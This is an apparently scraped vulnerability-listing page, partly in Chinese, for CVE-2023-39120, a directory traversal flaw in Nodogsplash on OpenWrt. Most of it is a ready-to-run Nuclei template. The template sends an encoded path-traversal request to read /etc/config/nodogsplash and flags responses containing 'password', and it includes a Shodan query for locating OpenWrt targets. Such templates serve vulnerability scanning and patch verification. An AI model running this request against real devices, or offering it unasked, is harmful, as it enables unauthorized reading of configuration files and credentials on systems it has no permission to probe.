CVE-2023-39120: Nodogsplash - Directory Traversal

日期: 2025-08-01 | 影响软件: Nodogsplash | POC: 已公开

漏洞描述

Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.

PoC代码[已公开]

id: CVE-2023-39120

info:
  name: Nodogsplash - Directory Traversal
  author: Numan Türle
  severity: high
  description: |
    Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
  impact: |
    An attacker can exploit this vulnerability to view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39120
    - https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed
    - https://gist.github.com/numanturle/55cb758bacc4930a081e79c2a6a769b6
    - https://github.com/openwrt/routing/pull/997
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-39120
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"OpenWRT"
  tags: cve2023,cve,lfi,openwrt,nodogsplash

http:
  - method: GET
    path:
      - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "nodogsplash"
          - "password"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008eee1e89d3b9b7c19c9f6781240f1b0af3f99dfee2dd894ee753eb569ba5a5ce022063229c9c9955c5ac4a190362bc64f569ac27e6f9059300b5bd9d5211cb8fad78:922c64590222798bb761d5b6d8e72950